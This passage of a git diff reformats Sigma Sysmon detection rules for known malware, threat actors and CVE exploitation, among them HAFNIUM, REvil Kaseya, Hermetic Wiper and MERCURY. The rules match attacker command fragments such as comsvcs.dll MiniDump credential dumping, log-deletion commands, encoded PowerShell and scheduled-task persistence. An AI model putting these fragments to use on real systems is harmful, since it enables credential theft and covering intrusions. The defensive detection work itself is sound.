described in the securelist's Operation TunnelSnake report. references: - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 author: Bhabesh Raj diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml index 37cc0432b..63cc8ca81 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml @@ -1,13 +1,12 @@ title: Pingback Backdoor File Indicators id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml index b095c2143..fdedbd7ed 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml @@ -1,13 +1,12 @@ title: Pingback Backdoor DLL Loading Activity id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # File indicators + type: similar + - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml index 49a4d0ce3..b1cf6a588 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml @@ -1,13 +1,12 @@ title: Pingback Backdoor Activity id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 @@ -28,7 +27,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|endswith: \updata.exe - CommandLine|contains|all: + CommandLine|contains|all: - config - msdtc - start diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml index 17e4047df..22d43b5a5 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware File Indicator Creation id: 39466c42-c189-476a-989f-8cdb135c163a status: experimental -description: Detects filename indicators that contain a specific typo seen used by - the Small Sieve malware. +description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml index 0a820ea15..d6360b863 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware CommandLine Indicator id: 21117127-21c8-437a-ae03-4b51e5a8a088 status: test -description: Detects specific command line argument being passed to a binary as seen - being used by the malware Small Sieve. +description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: .exe Platypus + CommandLine|endswith: .exe Platypus condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml index ee4ce5fd5..50ba26a29 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware Registry Persistence id: 65c6e3c1-fb28-4c03-a51e-84919d8185f1 status: experimental -description: Detects registry value with specific intentional typo and strings seen - used by the Small Sieve malware +description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -22,8 +21,8 @@ detection: selection_path: TargetObject|contains: \Microsoft\Windows\CurrentVersion\Run\ selection_value: - - TargetObject|contains: Microsift - - Details|contains: .exe Platypus + - TargetObject|contains: Microsift + - Details|contains: .exe Platypus condition: registry_set and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml b/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml index 4402584b9..45f377839 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml @@ -1,8 +1,7 @@ title: HAFNIUM Exchange Exploitation Activity id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 status: test -description: Detects activity observed by different researchers to be HAFNIUM group - activity (or related) on Exchange servers +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers references: - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -27,17 +26,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_attrib: - CommandLine|contains|all: + CommandLine|contains|all: - attrib - ' +h ' - ' +s ' - ' +r ' - .aspx selection_vsperfmon: - - Image|contains: \ProgramData\VSPerfMon\ - - CommandLine|contains|all: - - schtasks - - VSPerfMon + - Image|contains: \ProgramData\VSPerfMon\ + - CommandLine|contains|all: + - schtasks + - VSPerfMon selection_opera_1: Image|endswith: Opera_browser.exe ParentImage|endswith: @@ -46,33 +45,33 @@ detection: selection_opera_2: Image|endswith: Users\Public\opera\Opera_browser.exe selection_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - Temp\__output selection_makecab_1: Image|endswith: \makecab.exe - CommandLine|contains|all: + CommandLine|contains|all: - inetpub\wwwroot\ - .dmp.zip selection_makecab_2: Image|endswith: \makecab.exe - CommandLine|contains: + CommandLine|contains: - Microsoft\Exchange Server\ - compressionmemory - .gif selection_7zip: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t7z ' - C:\Programdata\pst - \it.zip selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - \comsvcs.dll - Minidump - 'full ' - \inetpub\wwwroot selection_other: - CommandLine|contains: + CommandLine|contains: - Windows\Temp\xx.bat - Windows\WwanSvcdcs - Windows\Temp\cw.exe diff --git a/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml b/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml index e671fb6cd..4e513303f 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml @@ -1,8 +1,7 @@ title: REvil Kaseya Incident Malware Patterns id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5 status: test -description: Detects process command line patterns and locations used by REvil group - in Kaseya incident (can also match on other malware) +description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) references: - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers - https://www.joesandbox.com/analysis/443736/0/html @@ -26,7 +25,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - C:\Windows\cert.exe - del /q /f c:\kworking\agent.crt - Kaseya VSA Agent Hot-fix @@ -42,7 +41,7 @@ detection: - C:\kworking\agent.exe - C:\kworking1\agent.exe selection3: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /q /f - WebPages\Errors\webErrorLog.txt condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml b/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml index 9bf78fce3..fc4040b5e 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml @@ -1,8 +1,7 @@ title: APT PRIVATELOG Image Load Pattern id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc status: test -description: Detects an image load pattern as seen when a tool named PRIVATELOG is - used and rarely observed under legitimate circumstances +description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances references: - https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml b/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml index ab932d9c1..42588a14d 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml @@ -33,9 +33,9 @@ detection: Image|contains: - windows\system32\filepath2 - windows\system32\ime - CommandLine|contains: reg add + CommandLine|contains: reg add registry_key: - CommandLine|contains: + CommandLine|contains: - HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32 - HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32 condition: process_creation and (selection or all of registry_*) diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml index 8948b5a00..71a57b5a9 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml @@ -1,8 +1,7 @@ title: CVE-2022-24527 Microsoft Connected Cache LPE id: e0a41412-c69a-446f-8e6e-0e6d7483dad7 status: test -description: Detects files created during the local privilege exploitation of CVE-2022-24527 - Microsoft Connected Cache +description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache references: - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/ author: Florian Roth (Nextron Systems) @@ -23,7 +22,7 @@ detection: selection: TargetFilename|endswith: WindowsPowerShell\Modules\webAdministration\webAdministration.psm1 filter: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: file_event and (selection and not filter) diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml index 1363f9691..67c645075 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml @@ -1,9 +1,7 @@ title: Potential CVE-2022-26809 Exploitation Attempt id: a7cd7306-df8b-4398-b711-6f3e4935cf16 status: test -description: Detects suspicious remote procedure call (RPC) service anomalies based - on the spawned sub processes (long shot to detect the exploitation of vulnerabilities - like CVE-2022-26809) +description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 - https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml index df52af902..931cae025 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml @@ -1,16 +1,10 @@ title: Potential CVE-2022-29072 Exploitation Attempt id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3 status: test -description: 'Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege - escalation and command execution vulnerability. - - 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) - and command execution when a file with the .7z extension is dragged to the Help>Contents - area. This is caused by misconfiguration of 7z.dll and a heap overflow. - +description: | + Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. + 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. - - ' references: - https://github.com/kagancapar/CVE-2022-29072 - https://twitter.com/kagancapar/status/1515219358234161153 @@ -30,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentImage|endswith: \7zFM.exe filter_bat: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' /k ' - ' /r ' filter_null: - CommandLine: null + CommandLine: condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml index ccd5cf5c9..ef94c963e 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml @@ -1,8 +1,7 @@ title: Suspicious Sysmon as Execution Parent id: 6d1058a4-407e-4f3a-a144-1968c11dc5c3 status: experimental -description: Detects suspicious process executions in which Sysmon itself is the parent - of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120 - https://twitter.com/filip_dragovic/status/1590052248260055041 @@ -32,13 +31,13 @@ detection: - :\Windows\Sysmon.exe - :\Windows\Sysmon64.exe - :\Windows\System32\conhost.exe - - :\Windows\System32\WerFault.exe - - :\Windows\System32\WerFaultSecure.exe + - :\Windows\System32\WerFault.exe # When Sysmon crashes + - :\Windows\System32\WerFaultSecure.exe # When Sysmon crashes - :\Windows\System32\wevtutil.exe - :\Windows\SysWOW64\wevtutil.exe - - \AppData\Local\Temp\Sysmon.exe + - \AppData\Local\Temp\Sysmon.exe # When launching Sysmon 32bit version. filter_main_null: - Image: null + Image: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml b/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml index 93d101092..37bfacc7c 100644 --- a/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml +++ b/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml @@ -1,8 +1,7 @@ title: Hermetic Wiper TG Process Patterns id: 2f974656-6d83-4059-bbdf-68ac5403422f status: test -description: Detects process execution patterns found in intrusions related to the - Hermetic Wiper malware attacks against Ukraine in February 2022 +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia author: Florian Roth (Nextron Systems) @@ -24,13 +23,13 @@ detection: selection1: Image|endswith: \policydefinitions\postgresql.exe selection2: - - CommandLine|contains: - - CSIDL_SYSTEM_DRIVE\temp\sys.tmp - - ' 1> \\\\127.0.0.1\ADMIN$\__16' - - CommandLine|contains|all: - - 'powershell -c ' - - '\comsvcs.dll MiniDump ' - - \winupd.log full + - CommandLine|contains: + - CSIDL_SYSTEM_DRIVE\temp\sys.tmp + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - \winupd.log full condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml b/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml index 7b4a1ed94..034dc4905 100644 --- a/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml +++ b/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml @@ -1,8 +1,7 @@ title: Potential Raspberry Robin Dot Ending File id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a status: test -description: Detects commandline containing reference to files ending with a "." This - scheme has been seen used by raspberry-robin +description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin author: Nasreddine Bencherchali (Nextron Systems) references: - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -20,7 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} + # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png + # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png + # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png + CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} # cannot match on end-of-line because of FPs with bind DNS notation condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml b/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml index ad512a482..cd3896fe3 100644 --- a/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml +++ b/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml @@ -1,8 +1,7 @@ title: Potential ACTINIUM Persistence Activity id: e1118a8f-82f5-44b3-bb6b-8a284e5df602 status: test -description: Detects specific process parameters as used by ACTINIUM scheduled task - persistence creation. +description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. references: - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations author: Andreas Hunkeler (@Karneades) @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - create - wscript diff --git a/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml b/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml index 32466e0a6..72ad1d92d 100644 --- a/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml +++ b/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml @@ -21,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - -exec bypass -w 1 -enc - - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA + - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA # Start-Job -ScriptBlock condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml index 09b93a75e..d3cbd0c02 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml @@ -1,14 +1,11 @@ title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db related: - - id: f8987c03-4290-4c96-870f-55e75ee377f4 - type: similar + - id: f8987c03-4290-4c96-870f-55e75ee377f4 + type: similar status: experimental -description: 'Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center - / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. - create admin accounts and execute arbitrary commands. - - ' +description: | + Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. references: - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment @@ -37,12 +34,13 @@ detection: - \tomcat10.exe ParentCommandLine|contains: confluence selection_child: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + # Note: Only children associated with known campaigns + - Image|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml index 88bbfa8ba..f3b873eda 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml @@ -1,10 +1,7 @@ title: Outlook Task/Note Reminder Received id: fc06e655-d98c-412f-ac76-05c2698b1cb2 status: experimental -description: Detects changes to the registry values related to outlook that indicates - that a reminder was triggered for a Note or Task item. This could be a sign of - exploitation of CVE-2023-23397. Further investigation is required to determine - the success of an exploitation. +description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. references: - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml index c1fba0f53..be0f6c49e 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader id: 9cae055f-e1d2-4f81-b8a5-1986a68cdd84 status: experimental -description: Detects suspicious ".hta" file creation in the startup folder by Foxit - Reader. This can be an indication of CVE-2023-27363 exploitation. +description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. references: - https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363 - https://www.zerodayinitiative.com/advisories/ZDI-23-491/ diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml index e44dd100e..35dcd6e4d 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml @@ -47,6 +47,10 @@ detection: - \MOVEitTransfer\wwwroot\_human2.aspx - 